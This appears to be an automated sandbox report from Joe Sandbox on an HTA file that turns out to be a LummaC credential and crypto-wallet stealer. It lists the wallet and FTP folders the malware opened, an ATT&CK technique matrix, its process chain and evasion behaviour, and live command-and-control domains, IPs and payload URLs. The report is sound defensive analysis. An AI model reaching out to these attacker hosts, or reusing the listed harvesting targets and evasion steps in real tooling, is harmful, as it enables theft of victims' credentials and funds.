              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              2
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              Scheduled Task/Job
              111
              Process Injection
              3
              Obfuscated Files or Information
              LSASS Memory23
              System Information Discovery
              Remote Desktop Protocol4
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Scheduled Task/Job
              Logon Script (Windows)1
              Scheduled Task/Job
              2
              Software Packing
              Security Account Manager321
              Security Software Discovery
              SMB/Windows Admin Shares1
              Screen Capture
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts3
              PowerShell
              Login HookLogin Hook1
              DLL Side-Loading
              NTDS1
              Process Discovery
              Distributed Component Object Model1
              Email Collection
              114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets221
              Virtualization/Sandbox Evasion
              SSH2
              Clipboard Data
              Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts221
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
              Process Injection
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582671 Sample: Poket.mp4.hta Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 27 imbibelubmbe.click 2->27 29 deduhko.klipzyroloo.shop 2->29 31 cegu.shop 2->31 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 10 other signatures 2->45 9 mshta.exe 1 2->9         started        signatures3 process4 signatures5 55 Suspicious powershell command line found 9->55 12 powershell.exe 18 9->12         started        process6 signatures7 57 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->57 59 Suspicious powershell command line found 12->59 61 Found many strings related to Crypto-Wallets (likely being stolen) 12->61 63 3 other signatures 12->63 15 powershell.exe 15 26 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 35 deduhko.klipzyroloo.shop 188.114.97.3, 443, 49735, 49889 CLOUDFLARENETUS European Union 15->35 37 Injects a PE file into a foreign processes 15->37 21 powershell.exe 15->21         started        25 conhost.exe 15->25         started        signatures10 process11 dnsIp12 33 cegu.shop 185.161.251.21, 443, 49951 NTLGB United Kingdom 21->33 47 Query firmware table information (likely to detect VMs) 21->47 49 Found many strings related to Crypto-Wallets (likely being stolen) 21->49 51 Tries to harvest and steal ftp login credentials 21->51 53 3 other signatures 21->53 signatures13

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Poket.mp4.hta2%VirustotalBrowse
              Poket.mp4.hta0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://en.wPiX0%Avira URL Cloudsafe
              https://cegu.shop/U100%Avira URL Cloudmalware
              https://imbibelubmbe.click/api0%Avira URL Cloudsafe
              https://cegu.shop/100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txtopw100%Avira URL Cloudmalware
              https://cegu.shop:443/8574262446/ph.txt100%Avira URL Cloudmalware
              https://deduhko.klipzyroloo.shop100%Avira URL Cloudmalware
              https://cegu.shop/8574262446/ph.txtebKit/537.36100%Avira URL Cloudmalware
              https://cegu.shop/8574262446/ph.txtI100%Avira URL Cloudmalware
              https://klipvumisui.shop/int_clp_sha.txta=100%Avira URL Cloudmalware
              imbibelubmbe.click0%Avira URL Cloudsafe
              https://cegu.shop/8574262446/ph.txtSVHj100%Avira URL Cloudmalware
              https://cegu.shop/C100%Avira URL Cloudmalware
              https://imbibelubmbe.click/0%Avira URL Cloudsafe
              https://cegu.shop/x100%Avira URL Cloudmalware
              https://imbibelubmbe.click/apiq0%Avira URL Cloudsafe
              https://deduhko.klipzyroloo.shop/mazkk.eml100%Avira URL Cloudmalware
              https://deduhko.klipzyroloo.shop/mazLR100%Avira URL Cloudmalware
              https://deduhko.klipzyroloo.shop/mazkk.100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              cegu.shop
              185.161.251.21
              truefalse
                high
                imbibelubmbe.click
                188.114.97.3
                truetrue
                  unknown
                  deduhko.klipzyroloo.shop
                  188.114.97.3
                  truetrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    rabidcowse.shopfalse
                      high
                      wholersorie.shopfalse
                        high
                        https://imbibelubmbe.click/apitrue
                        • Avira URL Cloud: safe
                        unknown
                        cloudewahsj.shopfalse
                          high
                          noisycuttej.shopfalse
                            high
                            imbibelubmbe.clicktrue
                            • Avira URL Cloud: safe
                            unknown
                            nearycrepso.shopfalse
                              high
                              https://cegu.shop/8574262446/ph.txtfalse
                                high
                                https://deduhko.klipzyroloo.shop/mazkk.emltrue
                                • Avira URL Cloud: malware
                                unknown
                                framekgirus.shopfalse
                                  high
                                  tirepublicerj.shopfalse
                                    high
                                    abruptyopsn.shopfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://en.wPiXmshta.exe, 00000000.00000003.1660293289.0000000005A61000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cegu.shop:443/8574262446/ph.txtpowershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1783096842.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://stackoverflow.com/q/14436606/23354powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpfalse
                                          high
                                          https://github.com/mgravell/protobuf-netJpowershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpfalse
                                            high
                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Licensepowershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Iconpowershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://github.com/mgravell/protobuf-netpowershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpfalse
                                                      high
                                                      https://cegu.shop/powershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://deduhko.klipzyroloo.shoppowershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      https://dfgh.online/invoker.php?compName=powershell.exe, 0000000A.00000002.2890844747.0000000000779000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2893816228.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2897179208.0000000004D7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://cegu.shop/Upowershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2508992308.00000000047A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cegu.shop/8574262446/ph.txtIpowershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://cegu.shop/8574262446/ph.txtebKit/537.36powershell.exe, 0000000A.00000002.2888825435.000000000032B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://klipvumisui.shop/int_clp_sha.txtopwpowershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://klipvumisui.shop/int_clp_sha.txta=powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://cegu.shop/8574262446/ph.txtSVHjpowershell.exe, 0000000A.00000002.2892223741.00000000007A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://github.com/mgravell/protobuf-netipowershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpfalse
                                                            high
                                                            https://cegu.shop/Cpowershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1781410096.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.0000000004661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://stackoverflow.com/q/11564914/23354;powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                high
                                                                https://stackoverflow.com/q/2152978/23354powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                  high
                                                                  https://deduhko.klipzyroloo.shop/mazLRpowershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://contoso.com/powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1783096842.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.00000000056C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://cegu.shop/xpowershell.exe, 0000000A.00000002.2891598651.0000000000783000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://imbibelubmbe.click/powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://imbibelubmbe.click/apiqpowershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1781410096.0000000004EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2508992308.0000000004661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://deduhko.klipzyroloo.shop/mazkk.powershell.exe, 00000004.00000002.2542794546.0000000006D74000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://klipvumisui.shop/int_clp_sha.txtpowershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          188.114.97.3
                                                                          imbibelubmbe.clickEuropean Union
                                                                          13335CLOUDFLARENETUStrue
                                                                          185.161.251.21
                                                                          cegu.shopUnited Kingdom
                                                                          5089NTLGBfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1582671
                                                                          Start date and time:2024-12-31 08:56:09 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 7m 8s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:11
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:Poket.mp4.hta
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winHTA@9/6@3/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 50%
                                                                          HCA Information:
                                                                          • Successful, ratio: 92%
                                                                          • Number of executed functions: 182
                                                                          • Number of non-executed functions: 54
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .hta
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.175.87.197, 13.107.246.45
                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target mshta.exe, PID 6748 because there are no executed function
                                                                          • Execution Graph export aborted for target powershell.exe, PID 4108 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          TimeTypeDescription
                                                                          02:57:01API Interceptor87x Sleep call for process: powershell.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                          • www.rgenerousrs.store/o362/
                                                                          A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                          • www.beylikduzu616161.xyz/2nga/
                                                                          Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                          • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                          ce.vbsGet hashmaliciousUnknownBrowse
                                                                          • paste.ee/d/lxvbq
                                                                          Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                          • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                          PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                          • www.ssrnoremt-rise.sbs/3jsc/
                                                                          QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • filetransfer.io/data-package/zWkbOqX7/download
                                                                          http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                          • kklk16.bsyo45ksda.top/favicon.ico
                                                                          gusetup.exeGet hashmaliciousUnknownBrowse
                                                                          • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                          Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                          • gmtagency.online/api/check
                                                                          185.161.251.21setup.exeGet hashmaliciousLummaCBrowse
                                                                            Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                  installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                    @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                        MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                          installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            cegu.shopsetup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 185.161.251.21
                                                                                            Winter.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 185.161.251.21
                                                                                            imbibelubmbe.clickinstaller_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.42.198
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            CLOUDFLARENETUShttps://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                                                            • 104.21.96.1
                                                                                            Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.157.254
                                                                                            RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                            • 104.26.12.205
                                                                                            http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                                                                            • 104.18.27.193
                                                                                            http://parrottalks.infoGet hashmaliciousUnknownBrowse
                                                                                            • 1.1.1.1
                                                                                            https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                                                                            • 104.17.208.240
                                                                                            Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                            • 162.159.138.232
                                                                                            Loader.exeGet hashmaliciousMeduza StealerBrowse
                                                                                            • 104.26.13.205
                                                                                            https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 104.17.25.14
                                                                                            Set-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                                                                                            • 188.114.97.3
                                                                                            NTLGBkwari.arm.elfGet hashmaliciousUnknownBrowse
                                                                                            • 80.4.160.37
                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 185.161.251.21
                                                                                            botx.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 82.31.53.184
                                                                                            botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                            • 62.31.100.59
                                                                                            loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                            • 82.37.70.27
                                                                                            loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                            • 82.42.160.251
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            3b5074b1b5d032e5620f69f9f700ff0eFizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                            • 188.114.97.3
                                                                                            Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                            • 188.114.97.3
                                                                                            hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                            • 188.114.97.3
                                                                                            web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            random.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            Supplier.batGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                            • 188.114.97.3
                                                                                            NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                            • 188.114.97.3
                                                                                            a0e9f5d64349fb13191bc781f81f42e1Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 185.161.251.21
                                                                                            Set-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                                                                                            • 188.114.97.3
                                                                                            • 185.161.251.21
                                                                                            Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 185.161.251.21
                                                                                            X-mas_2.3.2.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
                                                                                            • 185.161.251.21
                                                                                            ReploidReplic.exeGet hashmaliciousLummaCBrowse
                                                                                            • 188.114.97.3
